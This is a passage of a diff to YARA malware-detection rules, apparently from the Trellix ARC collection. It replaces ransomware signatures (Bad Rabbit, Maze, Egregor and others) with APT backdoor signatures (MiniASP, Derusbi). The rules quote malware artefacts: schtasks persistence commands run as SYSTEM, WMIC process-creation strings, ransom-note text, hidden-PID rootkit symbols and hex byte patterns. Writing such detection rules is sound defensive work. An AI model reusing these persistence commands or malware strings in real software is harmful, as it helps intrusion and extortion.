"Trojan:W32/Manitsme" + actor_type = "Apt" actor_group = "Unknown" strings: - $pattern = { FF20476F206275696C642049443A20226A744368374D37436A4A5732634C5F636633374A2F49625946794336635A64735F4D796A56633461642F486B6D36694A4D39327847785F4F2D65746744692F664E37434C43622D59716E374D795947565A686F220A20FFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108766B83EC0CC744241400000000C7442418000000008B4424108400890424E88D0200008B44240485C0740789C183F8FF7514C744241400000000C74424180000000083C40CC3894C24088B44241083C004890424E8570200008B4424048B4C2408894C24148944241883C40CC3E8AE5A0400E979FFFFFFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EC00000083EC108B44241885C00F84C30000008B4424148400890424E8FD0100008B44240485C0742E89C183F8FF74E38B44241839C10F85800000008B44241C894424048B44241483C004890424E88B12000083C410C3E8620303008B442414890424C744240400000000C7442408FFFFFFFFE8A61200000FB644240C84C07507E868030300EB8B8B44241C894424048B4424148D4804890C24E83F1200008B442418894424048B442414890424E82B120000E83603030083C410C38D05408E4E008904248D05B8CC510089442404E8DA3F02000F0B8D05408E4E008904248D05B0CC510089442404E8C03F02000F0BE899590400E9F4FEFFFFCCCCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B4424088B4C240CF00FB14D000F94442410C3CCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B44240889C1F00FC1450001C1894C240CC3CCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B7424088B7C240C8B45008B550489C389D101F311F9F00FC74D0075F1895C2410894C2414C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B442404A90700000074068B05000000000F6F000F7F4424080F77C3CCCCCCCCE9CBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9BBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C24048B442408874500C3CCCCCCCCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B4424040FBCC074058944240CC38B4424080FBCC0740883C0208944240CC3C744240C40000000C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC83EC208B4424248B088B54242889CB01D1894C241C8B6804890424895C2404896C2408894C240C8B5C242C11DD896C2418896C2410E8160100000FB644241484C074C08B44241C894424308B4424188944243483C420C3CCCCCCCCCCCCCCCCCC83EC208B4424248B08894C24188B50048954241C890424894C2404895424088B5C2428895C240C8B6C242C896C2410E8BC0000000FB644241484C074C68B442418894424308B44241C8944243483C420C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9EBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DB000000CCCCCCCCCCCCCCCCCCCCCCE97B000000CCCCCCCCCCCCCCCCCCCCCCE9CB000000CCCCCCCCCCCCCCCCCCCCCCE9BBFEFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B2D000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCC8B5C24048B44240889C1F00FC10301C88944240CC3CCCCCCCCCCCCCCCCCCCCCC8B5C24048B44240887038944240CC3CCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B442404A90700000074068B05000000008D5C24080F6F000F7F030F77C3CCCC8B442404A90700000074068B05000000000F6F4424080F7F000F77B800000000F00FC10424C3CCCCCCCCCCCCCCCCCCCC8B4424048A5C2408F00818C3CCCCCCCC8B4424048A5C2408F02018C3CCCCCCCC648B0D140000008B89000000003B610876098B4424088944240CC3E860550400EBDECCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240801000000E8AF4400008B44240C8944241C83C410C3E80E550400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240802000000E85F4400008B44240C8944241C83C410C3E8BE540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240810000000E80F4400008B44240C8944241C83C410C3E86E540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC83EC108D42048B008B4C2414890C248B4C2418894C240489442408E8D04300008B44240C8944241C83C410C3CCCCCCCC648B0D140000008B89000000003B6108762C83EC108B4424148B088B400489442408890C248B44241889442404E88E4300008B44240C8944241C83C410C3E8ED530400EBBBCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B600000083EC108B442414F30F10000F57C90F2EC175060F8B860000000F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240804000000E8C74200008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E80F530400E92AFFFFFFCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B800000083EC108B442414F20F10000F57C9660F2EC175060F8B87000000660F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240808000000E8E54100008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E82D520400E928FFFFFFCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E815FEFFFF8B44241083C0048B4C2408890424894C2404E8FEFDFFFF8B4424088944241883C40CC3E8CD510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E895FEFFFF8B44241083C0088B4C2408890424894C2404E87EFEFFFF8B4424088944241883C40CC3E86D510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86F200000083EC248B4424288B0885C974678B49048B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E8B2FA03008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8F46603008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E81E8E00008B44240C8B4C2408890C2489442404E87A3602000F0BE853500400E9EEFEFFFFCCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EF00000083EC248B4424288B0885C974648B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E895F903008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8D76503008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E8018D00008B44240C8B4C2408890C2489442404E85D3502000F0BE8364F0400E9F1FEFFFFCC648B0D140000008B89000000003B61087606C644240C01C3 } + $s1 = "SvcMain.dll" fullword ascii + $s2 = "rj.soft.misecure.com" fullword ascii + $s3 = "d:\\rouji\\SvcMain.pdb" fullword ascii + $s4 = "constructor or from DllMain." fullword ascii + $s5 = "Open File Error" fullword ascii + $s6 = "nRet == SOCKET_ERROR" fullword ascii + $s7 = "Oh,shit" fullword ascii + $s8 = "Paraing" fullword ascii + $s9 = "Hallelujah" fullword ascii + $s10 = "ComSpec" fullword ascii + $s11 = "ServiceMain" fullword ascii + $s12 = "SendTo(s,(char *)&sztop,sizeof(sztop),FILETYPE) == ERRTYPE" fullword ascii condition: - uint16(0)==0x5a4d and filesize <8000KB and all of them + uint16(0)==0x5a4d and filesize <200KB and all of them } -import "pe" - -rule TRELLIX_ARC_Badbunny : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Miniasp_Pdb : TROJAN FILE { meta: - description = "Bad Rabbit Ransomware" - author = "Christiaan Beek" - id = "190ee396-4c26-54f7-baac-bb45e3587488" - date = "2017-10-24" + description = "Rule to detect MiniASP based on PDB" + author = "Marc Rivero | McAfee ATR Team" + id = "2e7e2990-5e7f-52b0-884a-fcb54b2f5488" + date = "2012-07-12" modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_BadRabbit.yar#L3-L47" + reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_MiniASP_pdb.yar#L1-L26" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "2879b8dc1ca0e86253354ac24b56d950878b23215b503da9b1d5faabd2c4bf9d" + hash = "42334f2119069b8c0ececfb14a7030e480b5d18ca1cc35f1ceaee847bc040e53" + logic_hash = "8ee6f93aaae2c48cc5835269fd526371040cd33cc309220f92a150444ba21055" score = 75 - quality = 45 - tags = "RANSOMWARE, FILE" + quality = 70 + tags = "TROJAN, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/BadRabbit" - actor_type = "Cybercrime" + malware_type = "trojan" + malware_family = "Trojan:W32/MiniASP" + actor_type = "Apt" actor_group = "Unknown" - hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93" strings: - $x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide - $x2 = "need to do is submit the payment and get the decryption password." fullword ascii - $s3 = "If you have already got the password, please enter it below." fullword ascii - $s4 = "dispci.exe" fullword wide - $s5 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" fullword wide - $s6 = "Run DECRYPT app at your desktop after system boot" fullword ascii - $s7 = "Enter password#1: " fullword wide - $s8 = "Enter password#2: " fullword wide - $s9 = "C:\\Windows\\cscc.dat" fullword wide - $s10 = "schtasks /Delete /F /TN %ws" fullword wide - $s11 = "Password#1: " fullword ascii - $s12 = "\\AppData" fullword wide - $s13 = "Disk decryption completed" fullword wide - $s14 = "Files decryption completed" fullword wide - $s15 = "http://diskcryptor.net/" fullword wide - $s16 = "Your personal installation key#1:" fullword ascii - $s17 = ".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg." wide - $s18 = "Disable your anti-virus and anti-malware programs" fullword wide - $s19 = "bootable partition not mounted" fullword ascii + $pdb = "\\Project\\mm\\Wininet\\Attack\\MiniAsp4\\Release\\MiniAsp.pdb" + $pdb1 = "\\XiaoME\\AiH\\20120410\\Attack\\MiniAsp3\\Release\\MiniAsp.pdb" condition: - ( uint16(0)==0x5a4d and filesize <400KB and pe.imphash()=="94f57453c539227031b918edd52fc7f1" and (1 of ($x*) or 4 of them )) or ( all of them ) + uint16(0)==0x5a4d and filesize <80KB and any of them } -import "pe" - -rule TRELLIX_ARC_Badrabbit_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi : BACKDOOR FILE { meta: - description = "Rule to detect Bad Rabbit Ransomware" + description = "Rule to detect the APT Derusbi ELF file" author = "Marc Rivero | McAfee ATR Team" - id = "d6e78c14-0913-5eed-be15-a6d1a8cd1a8d" - date = "2024-09-01" + id = "3b1c9644-7279-5e2c-8891-f03ca78cf3b7" + date = "2017-05-31" modified = "2020-08-14" - reference = "https://securelist.com/bad-rabbit-ransomware/82851/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_BadRabbit.yar#L49-L101" + reference = "https://attack.mitre.org/software/S0021/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Derusbi.yar#L1-L61" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "7536f021ce7fede0f1a2bf2f4ebc7d6e7269a6dd63005cab1fc6a309a71c61c0" + logic_hash = "0a83566a0540d28d1cc0ebee01d29d15ddc86cabff9044fd8a198b847ba24c50" score = 75 - quality = 43 - tags = "RANSOMWARE, FILE" - malware_type = "ransomware" - malware_family = "Ransom:W32/BadRabbit" + quality = 68 + tags = "BACKDOOR, FILE" + rule_version = "v1" + malware_type = "backdoor" + malware_family = "Backdoor:ELF/Derusbi" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $s1 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"" fullword wide - $s2 = "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\" fullword wide - $s3 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide - $s4 = "need to do is submit the payment and get the decryption password." fullword wide - $s5 = "schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide - $s6 = "rundll32 %s,#2 %s" fullword ascii - $s7 = " \\\"C:\\Windows\\%s\\\" #1 " fullword wide - $s8 = "Readme.txt" fullword wide - $s9 = "wbem\\wmic.exe" fullword wide - $s10 = "SYSTEM\\CurrentControlSet\\services\\%ws" fullword wide - $og1 = { 39 74 24 34 74 0a 39 74 24 20 0f 84 9f } - $og2 = { 74 0c c7 46 18 98 dd 00 10 e9 34 f0 ff ff 8b 43 } - $og3 = { 8b 3d 34 d0 00 10 8d 44 24 28 50 6a 04 8d 44 24 } - $oh1 = { 39 5d fc 0f 84 03 01 00 00 89 45 c8 6a 34 8d 45 } - $oh2 = { e8 14 13 00 00 b8 ff ff ff 7f eb 5b 8b 4d 0c 85 } - $oh3 = { e8 7b ec ff ff 59 59 8b 75 08 8d 34 f5 48 b9 40 } - $oj4 = { e8 30 14 00 00 b8 ff ff ff 7f 48 83 c4 28 c3 48 } - $oj5 = { ff d0 48 89 45 e0 48 85 c0 0f 84 68 ff ff ff 4c } - $oj6 = { 85 db 75 09 48 8b 0e ff 15 34 8f 00 00 48 8b 6c } - $ok1 = { 74 0c c7 46 18 c8 4a 40 00 e9 34 f0 ff ff 8b 43 } - $ok2 = { 68 f8 6c 40 00 8d 95 e4 f9 ff ff 52 ff 15 34 40 } - $ok3 = { e9 ef 05 00 00 6a 10 58 3b f8 73 30 8b 45 f8 85 } + $s1 = "LxMain" + $s2 = "execve" + $s3 = "kill" + $s4 = "cp -a %s %s" + $s5 = "%s &" + $s6 = "dbus-daemon" + $s7 = "--noprofile" + $s8 = "--norc" + $s9 = "TERM=vt100" + $s10 = "/proc/%u/cmdline" + $s11 = "loadso" + $s12 = "/proc/self/exe" + $s13 = "Proxy-Connection: Keep-Alive" + $s14 = "Connection: Keep-Alive" + $s15 = "CONNECT %s" + $s16 = "HOST: %s:%d" + $s17 = "User-Agent: Mozilla/4.0" + $s18 = "Proxy-Authorization: Basic %s" + $s19 = "Server: Apache" + $s20 = "Proxy-Authenticate" + $s21 = "gettimeofday" + $s22 = "pthread_create" + $s23 = "pthread_join" + $s24 = "pthread_mutex_init" + $s25 = "pthread_mutex_destroy" + $s26 = "pthread_mutex_lock" + $s27 = "getsockopt" + $s28 = "socket" + $s29 = "setsockopt" + $s30 = "select" + $s31 = "bind" + $s32 = "shutdown" + $s33 = "listen" + $s34 = "opendir" + $s35 = "readdir" + $s36 = "closedir" + $s37 = "rename" condition: - uint16(0)==0x5a4d and filesize <1000KB and ( all of ($s*) and all of ($og*)) or all of ($oh*) or all of ($oj*) or all of ($ok*) + ( uint32(0)==0x4464c457f) and filesize <200KB and all of them } -rule TRELLIX_ARC_Ransom_Maze : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Kernelmodule : BACKDOOR FILE { meta: - description = "Detecting MAZE Ransomware" - author = "McAfee ATR" - id = "098a93c4-9aab-5563-af17-7aa91b056f64" - date = "2020-04-19" - modified = "2020-10-12" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_Maze.yar#L1-L39" + description = "Rule to detect the Derusbi ELK Kernel module" + author = "Marc Rivero | McAfee ATR Team" + id = "1614a63d-c5d1-5ce1-a5b8-eb48325f60e6" + date = "2017-05-31" + modified = "2020-08-14" + reference = "https://attack.mitre.org/software/S0021/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Derusbi.yar#L63-L105" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "5badaf28bde6dcf77448b919e2290f95cd8d4e709ef2d699aae21f7bae68a76c" - logic_hash = "fc16475fbc2a2acf5d053ded4d2ec4126c6d6dcac3a6eafadcd6c61419dd7594" + logic_hash = "0b86e96ef616e926f0d665e2bd013f2773461483176c68bd5e7c7d059ac13d78" score = 75 - quality = 68 - tags = "RANSOMWARE, FILE" + quality = 70 + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Maze" + malware_type = "backdoor" + malware_family = "Backdoor:ELF/Derusbi" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $x1 = "process call create \"cmd /c start %s\"" fullword wide - $s1 = "%spagefile.sys" fullword wide - $s2 = "%sswapfile.sys" fullword wide - $s3 = "%shiberfil.sys" fullword wide - $s4 = "\\wbem\\wmic.exe" fullword wide - $s5 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" fullword ascii - $s6 = "NO MUTEX | " fullword wide - $s7 = "--nomutex" fullword wide - $s8 = ".Logging enabled | Maze" fullword wide - $s9 = "DECRYPT-FILES.txt" fullword wide - $op0 = { 85 db 0f 85 07 ff ff ff 31 c0 44 44 44 44 5e 5f } - $op1 = { 66 90 89 df 39 ef 89 fb 0f 85 64 ff ff ff eb 5a } - $op2 = { 56 e8 34 ca ff ff 83 c4 08 55 e8 0b ca ff ff 83 } + $s1 = "__this_module" + $s2 = "init_module" + $s3 = "unhide_pid" + $s4 = "is_hidden_pid" + $s5 = "clear_hidden_pid" + $s6 = "hide_pid" + $s7 = "license" + $s8 = "description" + $s9 = "srcversion=" + $s10 = "depends=" + $s11 = "vermagic=" + $s12 = "current_task" + $s13 = "sock_release" + $s14 = "module_layout" + $s15 = "init_uts_ns" + $s16 = "init_net" + $s17 = "init_task" + $s18 = "filp_open" + $s19 = "__netlink_kernel_create" + $s20 = "kfree_skb" condition: - ( uint16(0)==0x5a4d and filesize <500KB and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) + ( uint32(0)==0x4464c457f) and filesize <200KB and all of them } -rule TRELLIX_ARC_RANSOM_Mountlocker : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Linux_Sharedmemcreation : BACKDOOR FILE { meta: - description = "Rule to detect Mount Locker ransomware" - author = "McAfee ATR Team" - id = "8451b78c-3cef-557a-a2e3-0767a0b0eddb" - date = "2020-09-25" - modified = "2020-10-12" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_mountlocker.yar#L1-L32" + description = "Rule to detect Derusbi Linux Shared Memory creation" + author = "Marc Rivero | McAfee ATR Team" + id = "8d2db62e-22fa-5bbe-ab65-f294fc911b82" + date = "2017-05-31" + modified = "2020-08-14" + reference = "https://attack.mitre.org/software/S0021/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Derusbi.yar#L107-L130" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "fb332a6725b9276cca379dd3621943c69f88570fb317da27a857a2544d2aa4e0" + logic_hash = "095af979728f3b71e3192140306e4aa76011e07a25b20b0c5b3b98db41411714" score = 75 - quality = 64 - tags = "RANSOMWARE, FILE" + quality = 70 + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransomware:W32/MountLocker" + malware_type = "backdoor" + malware_family = "Backdoor:ELF/Derusbi" actor_type = "Cybercrime" actor_group = "Unknown" - hash1 = "4b917b60f4df6d6d08e895d179a22dcb7c38c6a6a6f39c96c3ded10368d86273" - hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963" strings: - $s1 = {63 69 64 3d 25 43 4c 49 45 4e 54 5f 49 44} - $s2 = {7a 73 61 33 77 78 76 62 62 37 67 76 36 35 77 6e 6c 37 6c 65 72 73 6c 65 65 33 63 37 69 32 37 6e 64 71 67 68 71 6d 36 6a 74 32 70 72 69 76 61 32 71 63 64 70 6f 6e 61 64 2e 6f 6e 69 6f 6e} - $s3 = {36 6d 6c 7a 61 68 6b 63 37 76 65 6a 79 74 70 70 62 71 68 71 6a 6f 75 34 69 70 66 74 67 73 33 67 69 7a 6f 66 32 78 34 7a 6b 6c 62 6c 6c 69 61 79 68 73 71 62 33 77 61 64 2e 6f 6e 69 6f 6e} + $byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 } condition: - uint16(0)==0x5a4d and filesize <300KB and ($s1 and $s2) or ($s1 and $s3) or $s1 + ( uint32(0)==0x464C457F) and filesize <200KB and all of them } -import "hash" -import "pe" - -rule TRELLIX_ARC_Ransom_Egregor : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Linux_Strings : BACKDOOR FILE { meta: - description = "Detect Egregor ransomware" - author = "Thomas Roccia | McAfee ATR team" - id = "b9f1a712-c168-5e0f-8b9e-cb03a6c43fc3" - date = "2020-10-28" - modified = "2020-10-28" - reference = "https://bazaar.abuse.ch/sample/004a2dc3ec7b98fa7fe6ae9c23a8b051ec30bcfcd2bc387c440c07ff5180fe9a/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_egregor.yar#L4-L31" + description = "Rule to detect APT Derusbi Linux Strings" + author = "Marc Rivero | McAfee ATR Team" + id = "09e47580-9b20-5461-943e-32b932c36214" + date = "2017-05-31" + modified = "2020-08-14" + reference = "https://attack.mitre.org/software/S0021/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Derusbi.yar#L132-L173" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "5f9fcbdf7ad86583eb2bbcaa5741d88a" - logic_hash = "8077c656eed0b1633da54f8d017d4eff122f2f4e486c4e1af6f6434ea33c0675" + logic_hash = "0e95497c44a0c1d85936a6a072063720a771b7e1eb8da2377e54577e3fc2764e" score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" + quality = 68 + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom/Egregor" + malware_type = "backdoor" + malware_family = "Backdoor:ELF/Derusbi" actor_type = "Cybercrime" - actor_group = "egregor" + actor_group = "Unknown" strings: - $p1 = "ewdk.pdb" fullword ascii - $p2 = "testbuild.pdb" fullword ascii - $s1 = "M:\\" nocase ascii - $s2 = "1z1M9U9" fullword wide - $s3 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide + $a1 = "loadso" wide ascii fullword + $a2 = "\nuname -a\n\n" wide ascii + $a3 = "/dev/shm/.x11.id" wide ascii + $a4 = "LxMain64" wide ascii nocase + $a5 = "# \\u@\\h:\\w \\$ " wide ascii + $b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide + $b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide + $b3 = "ret %d" wide fullword + $b4 = "uname -a\n\n" wide ascii + $b5 = "/proc/%u/cmdline" wide ascii + $b6 = "/proc/self/exe" wide ascii + $b7 = "cp -a %s %s" wide ascii + $c1 = "/dev/pts/4" wide ascii fullword + $c2 = "/tmp/1408.log" wide ascii fullword condition: - uint16(0)==0x5a4d and filesize <2000KB and hash.sha256(pe.rich_signature.clear_data)=="b030ed1a7ca222a0923a59f321be7e55b8d0fc24c1134df1ba775bcf0994c79c" or (pe.sections[4].name==".gfids" and pe.sections[5].name==".00cfg") and ( any of ($p*) or 2 of ($s*)) + uint32(0)==0x464C457F and filesize <200KB and ((1 of ($a*) and 4 of ($b*)) or (1 of ($a*) and 1 of ($c*)) or 2 of ($a*) or all of ($b*)) } -import "pe" - -rule TRELLIX_ARC_Ransom_Black_Kingdom : RANSOMWARE FILE +rule TRELLIX_ARC_Chikdos_Malware_Pdb : DOS FILE { meta: - description = "Rule to detect Black Kingdom ransomware that is spread using the latest Exchange vulns" - author = "McAfee ATR" - id = "c38e6dbf-7fb9-52f0-acd0-f824647b6041" - date = "2024-09-01" - modified = "2021-04-06" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/ransom_BlackKingDom.yar#L3-L49" + description = "Chikdos PDB" + author = "Marc Rivero | McAfee ATR Team" + id = "0174ff2b-57fc-5578-b45e-c08bf8528ee8" + date = "2013-12-02" + modified = "2020-08-14" + reference = "http://hackermedicine.com/tag/trojan-chickdos/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_chickdos_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "334e84a9469367ed64509203feb61b5f64d5a7e38d29ff5c5089631246b06588" - score = 50 - quality = 68 - tags = "RANSOMWARE, FILE" - malware_type = "ransomware" - malware_family = "Ransomware:W32/BlackKingdom_March2021" + hash = "c2a0e9f8e880ac22098d550a74940b1d81bc9fda06cebcf67f74782e55e9d9cc" + logic_hash = "150bf809a61aad00df0c49fb6a609b909c84ffb9ca442e143a6c5bf3dfc39314" + score = 75 + quality = 70 + tags = "DOS, FILE" + rule_version = "v1" + malware_type = "dos" + malware_family = "Dos:W32/ChickDos" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $0 = {7D3F634F627C5EC4D893189F1731F624A6AD458C3D89E9CB22C69EC4B4B588B1A7307D8963EC294C5B718C3D85692B8EB1A730732F8EB16F65EA5CEC17834A665E} - $1 = {3E774F2038FDE77377253CD11BFEB6FB82CF6A03E1B34E134C78A2CFDC1B7CD63AD167EE4E78A227FEF694EE3369143D1B0E84CF7CDAE7C3037C263DD15B979F} - $2 = {0C674D0A2427CDDD9B68213EC0B4A5DF94B19D39BEC0C562346FC7A1D32C0FA5BC9D963440910709A2365360650F5A909685912220EEC0F8157B3E2B95EA2CE9} - $3 = {7B7251266178C52BA731333F9E8A1C327A239FB81B901BAB2755FCAFD8A753F47991516A5C98A6CAAC9A1D5065DE565D87F120B3519DD91E09D353B7120EF9F2} - $4 = {2E233E25767037CA68F9C0F026A5CDDCC08FC0DCE21F61C612F1983A29BD3D986F8239A7692B0EBD478B6C8115564D5B0671346CF7CDDB612247EA7A4FAA7C71} - $5 = {2B2C3249094C8A1A9734E7515D10F78FD1B9339DF1902AC1D4ADE70C27C8A2CA7F3416B7B9F0D10E67519D589B8AD64D6435CC2DF4C2092A4BCEF7053B194AE5} - $6 = {0B297C7D79ECD339B30E87775B6769909CD886D1FBBAF2041DCC4FB11B5BA777AA626A9E8CAC14F64BEA5299A8E304A22BA25FA4F7AC4B95E8ACC42EC33A3DE4} - $7 = {0D46503D4DFD825DED41C94C055E1FCE1134C6F63AD80DCD7427F4BD502FA186077BD22653AB098C96ECDDA26557FB82BBA053CB2067C9DEA7EE0AF6A44C468A} - $8 = {2E774F2038FDE77277253CD11BFEB6FB82CB6A03E1B34E134C78A2CFDC1B5CD63AD167EE4E78A227FEF694EE3269143D1B0E84CF7CDAE5C3035C263DD15B979B} - $9 = {5C4250510A8DEF3463BF7410DEE0E72759B8A94A4D0544BD9B4FC0846E61844F4E06B779ABF906A450F5A2AC4C57CF761798C539175F092FD2429DC27909E382} - $10 = 